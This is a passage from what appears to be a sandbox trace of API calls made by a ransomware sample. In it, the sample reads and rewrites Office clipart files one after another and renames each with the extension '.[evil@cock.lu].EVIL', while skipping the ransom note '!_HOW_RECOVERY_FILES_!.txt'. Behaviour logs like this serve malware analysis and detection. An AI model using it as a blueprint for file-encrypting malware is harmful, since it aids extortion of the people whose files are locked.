lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc40, lpOverlapped=0x0) returned 1 [0113.945] CloseHandle (hObject=0x1a8) returned 1 [0113.945] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.945] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.945] __uncaught_exception () returned 0x84b1160800 [0113.945] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.945] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf.[evil@cock.lu].evil")) returned 1 [0113.946] ??_V@YAXPEAX@Z () returned 0x1 [0113.949] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF", dwFileAttributes=0x200) returned 0 [0113.949] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.949] wcsstr (_Str="BS00224_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.949] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 69 [0113.949] wcscmp (_String1="BS00224_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.949] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00224_.WMF") returned 0x0 [0113.949] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 0x45 [0113.949] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.951] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x634, lpOverlapped=0x0) returned 1 [0113.983] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.983] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.983] _errno () returned 0x84b1160840 [0113.983] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.983] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x640, lpOverlapped=0x0) returned 1 [0113.983] CloseHandle (hObject=0x1a8) returned 1 [0113.983] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.983] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.983] __uncaught_exception () returned 0x84b1160800 [0113.983] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.984] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf.[evil@cock.lu].evil")) returned 1 [0113.984] ??_V@YAXPEAX@Z () returned 0x1 [0113.987] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF", dwFileAttributes=0x200) returned 0 [0113.987] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.987] wcsstr (_Str="BS00438_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.987] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 69 [0113.987] wcscmp (_String1="BS00438_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.987] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00438_.WMF") returned 0x0 [0113.987] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 0x45 [0113.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.989] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4bc, lpOverlapped=0x0) returned 1 [0114.001] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.001] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.001] _errno () returned 0x84b1160840 [0114.001] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.001] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c0, lpOverlapped=0x0) returned 1 [0114.001] CloseHandle (hObject=0x1a8) returned 1 [0114.002] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.002] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.002] __uncaught_exception () returned 0x84b1160800 [0114.002] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.002] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf.[evil@cock.lu].evil")) returned 1 [0114.003] ??_V@YAXPEAX@Z () returned 0x1 [0114.005] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF", dwFileAttributes=0x200) returned 0 [0114.005] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.005] wcsstr (_Str="BS00439_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.005] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 69 [0114.005] wcscmp (_String1="BS00439_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.005] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00439_.WMF") returned 0x0 [0114.005] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 0x45 [0114.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.007] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x804, lpOverlapped=0x0) returned 1 [0114.010] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.010] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.010] _errno () returned 0x84b1160840 [0114.010] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.010] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0114.010] CloseHandle (hObject=0x1a8) returned 1 [0114.010] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.010] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.010] __uncaught_exception () returned 0x84b1160800 [0114.010] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.010] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf.[evil@cock.lu].evil")) returned 1 [0114.011] ??_V@YAXPEAX@Z () returned 0x1 [0114.013] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF", dwFileAttributes=0x200) returned 0 [0114.014] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.014] wcsstr (_Str="BS00440_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.014] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 69 [0114.014] wcscmp (_String1="BS00440_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.014] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00440_.WMF") returned 0x0 [0114.014] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 0x45 [0114.014] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.015] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15cc, lpOverlapped=0x0) returned 1 [0114.020] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.020] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.020] _errno () returned 0x84b1160840 [0114.020] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.021] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x15e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15e0, lpOverlapped=0x0) returned 1 [0114.021] CloseHandle (hObject=0x1a8) returned 1 [0114.021] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.021] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.021] __uncaught_exception () returned 0x84b1160800 [0114.021] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.021] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf.[evil@cock.lu].evil")) returned 1 [0114.022] ??_V@YAXPEAX@Z () returned 0x1 [0114.024] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF", dwFileAttributes=0x200) returned 0 [0114.025] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.025] wcsstr (_Str="BS00441_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.025] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 69 [0114.025] wcscmp (_String1="BS00441_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.025] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00441_.WMF") returned 0x0 [0114.025] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 0x45 [0114.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.026] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdc4, lpOverlapped=0x0) returned 1 [0114.029] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.029] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.029] _errno () returned 0x84b1160840 [0114.029] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.029] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xde0, lpOverlapped=0x0) returned 1 [0114.029] CloseHandle (hObject=0x1a8) returned 1 [0114.029] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.029] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.029] __uncaught_exception () returned 0x84b1160800 [0114.030] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.030] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf.[evil@cock.lu].evil")) returned 1 [0114.030] ??_V@YAXPEAX@Z () returned 0x1 [0114.034] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF", dwFileAttributes=0x200) returned 0 [0114.034] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.034] wcsstr (_Str="BS00442_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.034] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 69 [0114.034] wcscmp (_String1="BS00442_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.034] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00442_.WMF") returned 0x0 [0114.034] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 0x45 [0114.034] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.036] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9b8, lpOverlapped=0x0) returned 1 [0114.074] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.074] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.074] _errno () returned 0x84b1160840 [0114.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.074] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0, lpOverlapped=0x0) returned 1 [0114.074] CloseHandle (hObject=0x1a8) returned 1 [0114.074] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.075] __uncaught_exception () returned 0x84b1160800 [0114.075] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.075] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf.[evil@cock.lu].evil")) returned 1 [0114.075] ??_V@YAXPEAX@Z () returned 0x1 [0114.078] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF", dwFileAttributes=0x200) returned 0 [0114.078] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.078] wcsstr (_Str="BS00443_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.078] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 69 [0114.078] wcscmp (_String1="BS00443_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.078] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00443_.WMF") returned 0x0 [0114.078] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 0x45 [0114.078] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.080] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x68c, lpOverlapped=0x0) returned 1 [0114.086] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.086] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.086] _errno () returned 0x84b1160840 [0114.086] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.086] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6a0, lpOverlapped=0x0) returned 1 [0114.086] CloseHandle (hObject=0x1a8) returned 1 [0114.087] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.087] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.087] __uncaught_exception () returned 0x84b1160800 [0114.087] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.087] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf.[evil@cock.lu].evil")) returned 1 [0114.088] ??_V@YAXPEAX@Z () returned 0x1 [0114.091] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF", dwFileAttributes=0x200) returned 0 [0114.091] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.092] wcsstr (_Str="BS00444_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.092] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 69 [0114.092] wcscmp (_String1="BS00444_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.092] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00444_.WMF") returned 0x0 [0114.092] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 0x45 [0114.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.094] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf38, lpOverlapped=0x0) returned 1 [0114.100] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.100] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.100] _errno () returned 0x84b1160840 [0114.100] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.100] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf40, lpOverlapped=0x0) returned 1 [0114.100] CloseHandle (hObject=0x1a8) returned 1 [0114.100] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.100] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: 